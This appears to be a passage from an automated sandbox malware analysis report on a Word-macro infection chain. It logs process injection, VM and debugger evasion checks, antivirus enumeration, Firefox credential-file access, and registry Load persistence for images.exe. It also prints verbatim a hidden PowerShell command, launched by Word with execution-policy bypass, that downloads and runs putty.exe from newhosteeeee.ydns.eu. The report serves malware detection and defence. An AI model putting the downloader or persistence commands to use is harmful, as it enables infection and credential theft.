        Source: C:\Users\user\AppData\Roaming\putty.exe TID: 2984Thread sleep time: -42305s >= -30000sJump to behavior
        Source: C:\Users\user\AppData\Roaming\putty.exe TID: 1244Thread sleep time: -922337203685477s >= -30000sJump to behavior
        Source: C:\Users\user\AppData\Roaming\putty.exe TID: 2300Thread sleep count: 70 > 30Jump to behavior
        Source: C:\ProgramData\images.exe TID: 152Thread sleep time: -46429s >= -30000s
        Source: C:\ProgramData\images.exe TID: 2620Thread sleep time: -922337203685477s >= -30000s
        Source: C:\ProgramData\images.exe TID: 1192Thread sleep count: 70 > 30
        Source: C:\ProgramData\images.exe TID: 2440Thread sleep time: -420000s >= -30000s
        Source: C:\Windows\SysWOW64\cmd.exe TID: 2752Thread sleep count: 709 > 30
        Source: C:\Windows\SysWOW64\cmd.exe TID: 2752Thread sleep time: -8508000s >= -30000s
        Source: C:\Users\user\AppData\Roaming\iBCrDCK.i.exe TID: 2248Thread sleep time: -39409s >= -30000s
        Source: C:\Users\user\AppData\Roaming\iBCrDCK.i.exe TID: 1480Thread sleep time: -922337203685477s >= -30000s
        Source: C:\Users\user\AppData\Roaming\iBCrDCK.i.exe TID: 1960Thread sleep time: -11068046444225724s >= -30000s
        Source: C:\Windows\SysWOW64\cmd.exeLast function: Thread delayed
        Source: C:\Windows\SysWOW64\cmd.exeLast function: Thread delayed
        Source: C:\ProgramData\images.exeCode function: 21_3_042397E0 GetSystemTime followed by cmp: cmp edx, 04h and CTI: jc 0423983Bh21_3_042397E0
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 13_2_00411446 FindFirstFileW,FindNextFileW,13_2_00411446
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 13_2_0040955B GetFullPathNameA,PathCombineA,PathCombineA,FindFirstFileA,PathCombineA,PathCombineA,FindNextFileA,13_2_0040955B
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 15_2_00411446 FindFirstFileW,FindNextFileW,15_2_00411446
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 15_2_0040955B GetFullPathNameA,PathCombineA,PathCombineA,FindFirstFileA,PathCombineA,PathCombineA,FindNextFileA,15_2_0040955B
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 13_2_0041154A GetLogicalDriveStringsW,GetLogicalDriveStringsW,GetDriveTypeW,13_2_0041154A
        Source: C:\ProgramData\images.exeCode function: 21_3_04239970 GetSystemInfo,21_3_04239970
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Users\user\AppData\Roaming\putty.exeThread delayed: delay time: 44533Jump to behavior
        Source: C:\Users\user\AppData\Roaming\putty.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Users\user\AppData\Roaming\putty.exeThread delayed: delay time: 42305Jump to behavior
        Source: C:\Users\user\AppData\Roaming\putty.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\ProgramData\images.exeThread delayed: delay time: 46429
        Source: C:\ProgramData\images.exeThread delayed: delay time: 922337203685477
        Source: C:\Users\user\AppData\Roaming\iBCrDCK.i.exeThread delayed: delay time: 39409
        Source: C:\Users\user\AppData\Roaming\iBCrDCK.i.exeThread delayed: delay time: 922337203685477
        Source: C:\Users\user\AppData\Roaming\iBCrDCK.i.exeThread delayed: delay time: 922337203685477
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
        Source: putty.exe, 0000000B.00000002.2119646724.00000000025F7000.00000004.00000001.sdmpBinary or memory string: vmware
        Source: putty.exe, 0000000B.00000002.2119646724.00000000025F7000.00000004.00000001.sdmpBinary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
        Source: putty.exe, 0000000B.00000002.2119646724.00000000025F7000.00000004.00000001.sdmpBinary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
        Source: powershell.exe, 00000006.00000002.2096271913.00000000002FE000.00000004.00000020.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
        Source: putty.exe, 0000000B.00000002.2119646724.00000000025F7000.00000004.00000001.sdmpBinary or memory string: VMWARE
        Source: putty.exe, 0000000B.00000002.2119646724.00000000025F7000.00000004.00000001.sdmpBinary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
        Source: putty.exe, 0000000B.00000002.2119646724.00000000025F7000.00000004.00000001.sdmpBinary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
        Source: putty.exe, 0000000B.00000002.2119646724.00000000025F7000.00000004.00000001.sdmpBinary or memory string: VMware SVGA II
        Source: putty.exe, 0000000B.00000002.2119646724.00000000025F7000.00000004.00000001.sdmpBinary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
        Source: C:\ProgramData\images.exeCode function: 21_3_0429723B _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,21_3_0429723B
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 13_2_004060B0 LoadLibraryA,GetProcAddress,ExitProcess,13_2_004060B0
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 13_2_00426222 mov eax, dword ptr fs:[00000030h]13_2_00426222
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 13_2_0041EB27 mov eax, dword ptr fs:[00000030h]13_2_0041EB27
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 13_2_00411B38 mov eax, dword ptr fs:[00000030h]13_2_00411B38
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 13_2_00411B3F mov eax, dword ptr fs:[00000030h]13_2_00411B3F
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 13_2_00411E6D mov eax, dword ptr fs:[00000030h]13_2_00411E6D
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 15_2_00426222 mov eax, dword ptr fs:[00000030h]15_2_00426222
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 15_2_0041EB27 mov eax, dword ptr fs:[00000030h]15_2_0041EB27
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 15_2_00411B38 mov eax, dword ptr fs:[00000030h]15_2_00411B38
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 15_2_00411B3F mov eax, dword ptr fs:[00000030h]15_2_00411B3F
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 15_2_00411E6D mov eax, dword ptr fs:[00000030h]15_2_00411E6D
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 13_2_00406045 GetProcessHeap,RtlAllocateHeap,13_2_00406045
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
        Source: C:\Users\user\AppData\Roaming\putty.exeProcess token adjusted: DebugJump to behavior
        Source: C:\ProgramData\images.exeProcess token adjusted: Debug
        Source: C:\Users\user\AppData\Roaming\iBCrDCK.i.exeProcess token adjusted: Debug
        Source: C:\Users\user\AppData\Roaming\iBCrDCK.i.exeProcess token adjusted: Debug
        Source: C:\ProgramData\images.exeCode function: 21_3_0429723B _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,21_3_0429723B
        Source: C:\Users\user\AppData\Roaming\putty.exeMemory allocated: page read and write | page guardJump to behavior

        HIPS / PFW / Operating System Protection Evasion:

        barindex
        Allocates memory in foreign processesShow sources
        Source: C:\ProgramData\images.exeMemory allocated: C:\Windows\SysWOW64\cmd.exe base: 120000 protect: page execute and read and write
        Source: C:\ProgramData\images.exeMemory allocated: C:\Windows\SysWOW64\cmd.exe base: 130000 protect: page read and write
        Bypasses PowerShell execution policyShow sources
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://newhosteeeee.ydns.eu/putty.exe','C:\Users\user\AppData\Roaming\putty.exe');Start-Process 'C:\Users\user\AppData\Roaming\putty.exe''
        Contains functionality to inject threads in other processesShow sources
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 13_2_00407B2E OpenProcess,GetCurrentProcess,MessageBoxA,VirtualAllocEx,VirtualAllocEx,VirtualProtectEx,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,CreateRemoteThread,13_2_00407B2E
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 13_2_00407D5E OpenProcess,VirtualAllocEx,VirtualProtectEx,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,CreateRemoteThread,13_2_00407D5E
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 13_2_00413F7F RegSetValueExA,OpenProcess,GetCurrentProcessId,GetModuleFileNameA,VirtualAllocEx,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,VirtualProtectEx,VirtualAllocEx,WriteProcessMemory,CreateRemoteThread,13_2_00413F7F
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 15_2_00407B2E OpenProcess,GetCurrentProcess,MessageBoxA,VirtualAllocEx,VirtualAllocEx,VirtualProtectEx,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,CreateRemoteThread,15_2_00407B2E
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 15_2_00407D5E OpenProcess,VirtualAllocEx,VirtualProtectEx,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,CreateRemoteThread,15_2_00407D5E
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 15_2_00413F7F RegSetValueExA,OpenProcess,GetCurrentProcessId,GetModuleFileNameA,VirtualAllocEx,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,VirtualProtectEx,VirtualAllocEx,WriteProcessMemory,CreateRemoteThread,15_2_00413F7F
        Creates a thread in another existing process (thread injection)Show sources
        Source: C:\ProgramData\images.exeThread created: C:\Windows\SysWOW64\cmd.exe EIP: 12010E
        Injects a PE file into a foreign processesShow sources
        Source: C:\Users\user\AppData\Roaming\putty.exeMemory written: C:\Users\user\AppData\Roaming\putty.exe base: 400000 value starts with: 4D5AJump to behavior
        Source: C:\Users\user\AppData\Roaming\putty.exeMemory written: C:\Users\user\AppData\Roaming\putty.exe base: 400000 value starts with: 4D5AJump to behavior
        Source: C:\ProgramData\images.exeMemory written: C:\ProgramData\images.exe base: 400000 value starts with: 4D5A
        Source: C:\Users\user\AppData\Roaming\iBCrDCK.i.exeMemory written: C:\Users\user\AppData\Roaming\iBCrDCK.i.exe base: 400000 value starts with: 4D5A
        Injects files into Windows applicationShow sources
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEInjected file: C:\Users\user\AppData\Local\GDIPFONTCACHEV1.DAT was created by C:\Users\user\AppData\Roaming\putty.exeJump to behavior
        Source: C:\Windows\System32\notepad.exeInjected file: C:\Users\user\AppData\Local\Temp\abdtfhghgdghgh .ScT was created by C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
        Writes to foreign memory regionsShow sources
        Source: C:\ProgramData\images.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 120000
        Source: C:\ProgramData\images.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 130000
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: RegSetValueExA,CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle, explorer.exe13_2_0041405F
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: RegSetValueExA,CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle, explorer.exe15_2_0041405F
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\putty.exe 'C:\Users\user\AppData\Roaming\putty.exe' Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\putty.exe 'C:\Users\user\AppData\Roaming\putty.exe' Jump to behavior
        Source: C:\Users\user\AppData\Roaming\putty.exeProcess created: C:\Users\user\AppData\Roaming\putty.exe C:\Users\user\AppData\Roaming\putty.exeJump to behavior
        Source: C:\Users\user\AppData\Roaming\putty.exeProcess created: C:\Users\user\AppData\Roaming\putty.exe C:\Users\user\AppData\Roaming\putty.exeJump to behavior
        Source: C:\Users\user\AppData\Roaming\putty.exeProcess created: C:\Users\user\AppData\Roaming\putty.exe C:\Users\user\AppData\Roaming\putty.exeJump to behavior
        Source: C:\Users\user\AppData\Roaming\putty.exeProcess created: C:\Users\user\AppData\Roaming\putty.exe C:\Users\user\AppData\Roaming\putty.exeJump to behavior
        Source: C:\Users\user\AppData\Roaming\putty.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c REG ADD 'HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows' /f /v Load /t REG_SZ /d 'C:\ProgramData\images.exe'Jump to behavior
        Source: C:\Users\user\AppData\Roaming\putty.exeProcess created: C:\ProgramData\images.exe C:\ProgramData\images.exeJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD 'HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows' /f /v Load /t REG_SZ /d 'C:\ProgramData\images.exe'
        Source: C:\ProgramData\images.exeProcess created: C:\ProgramData\images.exe C:\ProgramData\images.exe
        Source: C:\ProgramData\images.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\System32\cmd.exe
        Source: C:\ProgramData\images.exeProcess created: C:\Users\user\AppData\Roaming\iBCrDCK.i.exe 'C:\Users\user\AppData\Roaming\iBCrDCK.i.exe'
        Source: C:\Users\user\AppData\Roaming\iBCrDCK.i.exeProcess created: C:\Users\user\AppData\Roaming\iBCrDCK.i.exe C:\Users\user\AppData\Roaming\iBCrDCK.i.exe
        Source: C:\Users\user\AppData\Roaming\iBCrDCK.i.exeProcess created: C:\Users\user\AppData\Roaming\iBCrDCK.i.exe C:\Users\user\AppData\Roaming\iBCrDCK.i.exe
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://newhosteeeee.ydns.eu/putty.exe','C:\Users\user\AppData\Roaming\putty.exe');Start-Process 'C:\Users\user\AppData\Roaming\putty.exe''
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://newhosteeeee.ydns.eu/putty.exe','C:\Users\user\AppData\Roaming\putty.exe');Start-Process 'C:\Users\user\AppData\Roaming\putty.exe''
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://newhosteeeee.ydns.eu/putty.exe','C:\Users\user\AppData\Roaming\putty.exe');Start-Process 'C:\Users\user\AppData\Roaming\putty.exe''
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://newhosteeeee.ydns.eu/putty.exe','C:\Users\user\AppData\Roaming\putty.exe');Start-Process 'C:\Users\user\AppData\Roaming\putty.exe''Jump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://newhosteeeee.ydns.eu/putty.exe','C:\Users\user\AppData\Roaming\putty.exe');Start-Process 'C:\Users\user\AppData\Roaming\putty.exe''Jump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://newhosteeeee.ydns.eu/putty.exe','C:\Users\user\AppData\Roaming\putty.exe');Start-Process 'C:\Users\user\AppData\Roaming\putty.exe''Jump to behavior
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 13_2_00412E91 InitializeSecurityDescriptor,SetSecurityDescriptorDacl,RegCreateKeyExA,RegCloseKey,SetLastError,13_2_00412E91
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 13_2_00410A8C AllocateAndInitializeSid,LookupAccountSidW,GetLastError,FreeSid,13_2_00410A8C
        Source: images.exeBinary or memory string: GetProgmanWindow
        Source: images.exeBinary or memory string: SetProgmanWindow
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 13_2_00410E5E cpuid 13_2_00410E5E
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\hh.exe VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Program Files\Common Files\Microsoft Shared\OFFICE14\FLTLDR.EXEQueries volume information: C:\Users\user\AppData\Local\Temp\OICE_9306262C-FECE-4A9E-949D-FCC308D5F5A8.0\FLD93F.tmp VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\hh.exe VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\hh.exe VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\ProgramData\images.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\secmod.db VolumeInformation
        Source: C:\ProgramData\images.exeQueries volume information: C:\ VolumeInformation
        Source: C:\ProgramData\images.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\cert8.db VolumeInformation
        Source: C:\ProgramData\images.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\key3.db VolumeInformation
        Source: C:\Windows\System32\notepad.exeQueries volume information: C:\Users\user\AppData\Local\Temp\abdtfhghgdghgh .ScT VolumeInformation
        Source: C:\Users\user\AppData\Roaming\iBCrDCK.i.exeQueries volume information: C:\Users\user\AppData\Roaming\iBCrDCK.i.exe VolumeInformation
        Source: C:\Windows\System32\drvinst.exeQueries volume information: C:\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Common-Drivers-Package~31bf3856ad364e35~amd64~~6.1.7601.17514.cat VolumeInformation
        Source: C:\Users\user\AppData\Roaming\iBCrDCK.i.exeQueries volume information: C:\Users\user\AppData\Roaming\iBCrDCK.i.exe VolumeInformation
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 13_2_00408D0F GetModuleHandleA,SHGetFolderPathW,lstrcatW,lstrcatW,CreateDirectoryW,lstrcpyW,lstrcatW,GetLocalTime,wsprintfW,CreateFileW,CloseHandle,RegisterClassW,CreateWindowExW,GetMessageA,GetMessageA,TranslateMessage,DispatchMessageA,GetMessageA,13_2_00408D0F
        Source: C:\ProgramData\images.exeCode function: 21_3_042973C6 __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,21_3_042973C6
        Source: C:\ProgramData\images.exeCode function: 21_3_042394E0 GetVersionExW,MultiByteToWideChar,MultiByteToWideChar,_malloc,MultiByteToWideChar,_free,GetVersionExW,GetDiskFreeSpaceW,GetDiskFreeSpaceA,_free,21_3_042394E0
        Source: C:\Users\user\AppData\Roaming\putty.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

        Lowering of HIPS / PFW / Operating System Security Settings:

        barindex
        Increases the number of concurrent connection per server for Internet ExplorerShow sources
        Source: C:\Users\user\AppData\Roaming\putty.exeRegistry key created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings MaxConnectionsPerServer 10Jump to behavior
        Source: C:\Users\user\AppData\Roaming\putty.exeWMI Queries: IWbemServices::ExecQuery - SELECT DisplayName FROM AntiVirusProduct
        Source: C:\Users\user\AppData\Roaming\putty.exeWMI Queries: IWbemServices::ExecQuery - SELECT DisplayName FROM AntiSpywareProduct
        Source: C:\Users\user\AppData\Roaming\putty.exeWMI Queries: IWbemServices::ExecQuery - SELECT DisplayName FROM FirewallProduct
        Source: C:\Users\user\AppData\Roaming\putty.exeWMI Queries: IWbemServices::ExecQuery - SELECT DisplayName FROM AntiVirusProduct
        Source: C:\Users\user\AppData\Roaming\putty.exeWMI Queries: IWbemServices::ExecQuery - SELECT DisplayName FROM AntiSpywareProduct
        Source: C:\Users\user\AppData\Roaming\putty.exeWMI Queries: IWbemServices::ExecQuery - SELECT DisplayName FROM FirewallProduct
        Source: C:\Users\user\AppData\Roaming\putty.exeWMI Queries: IWbemServices::ExecQuery - SELECT DisplayName FROM AntiVirusProduct
        Source: C:\Users\user\AppData\Roaming\putty.exeWMI Queries: IWbemServices::ExecQuery - SELECT DisplayName FROM AntiSpywareProduct
        Source: C:\Users\user\AppData\Roaming\putty.exeWMI Queries: IWbemServices::ExecQuery - SELECT DisplayName FROM FirewallProduct
        Source: C:\Users\user\AppData\Roaming\putty.exeWMI Queries: IWbemServices::ExecQuery - SELECT DisplayName FROM AntiVirusProduct
        Source: C:\Users\user\AppData\Roaming\putty.exeWMI Queries: IWbemServices::ExecQuery - SELECT DisplayName FROM AntiSpywareProduct
        Source: C:\Users\user\AppData\Roaming\putty.exeWMI Queries: IWbemServices::ExecQuery - SELECT DisplayName FROM FirewallProduct
        Source: C:\Users\user\AppData\Roaming\putty.exeWMI Queries: IWbemServices::ExecQuery - SELECT DisplayName FROM AntiVirusProduct
        Source: C:\Users\user\AppData\Roaming\putty.exeWMI Queries: IWbemServices::ExecQuery - SELECT DisplayName FROM AntiSpywareProduct
        Source: C:\Users\user\AppData\Roaming\putty.exeWMI Queries: IWbemServices::ExecQuery - SELECT DisplayName FROM FirewallProduct
        Source: C:\Users\user\AppData\Roaming\putty.exeWMI Queries: IWbemServices::ExecQuery - SELECT DisplayName FROM AntiVirusProduct
        Source: C:\Users\user\AppData\Roaming\putty.exeWMI Queries: IWbemServices::ExecQuery - SELECT DisplayName FROM AntiSpywareProduct
        Source: C:\Users\user\AppData\Roaming\putty.exeWMI Queries: IWbemServices::ExecQuery - SELECT DisplayName FROM FirewallProduct
        Source: C:\Users\user\AppData\Roaming\putty.exeWMI Queries: IWbemServices::ExecQuery - SELECT DisplayName FROM AntiVirusProduct
        Source: C:\Users\user\AppData\Roaming\putty.exeWMI Queries: IWbemServices::ExecQuery - SELECT DisplayName FROM AntiSpywareProduct
        Source: C:\Users\user\AppData\Roaming\putty.exeWMI Queries: IWbemServices::ExecQuery - SELECT DisplayName FROM FirewallProduct
        Source: C:\Users\user\AppData\Roaming\putty.exeWMI Queries: IWbemServices::ExecQuery - SELECT DisplayName FROM AntiVirusProduct
        Source: C:\Users\user\AppData\Roaming\putty.exeWMI Queries: IWbemServices::ExecQuery - SELECT DisplayName FROM AntiSpywareProduct
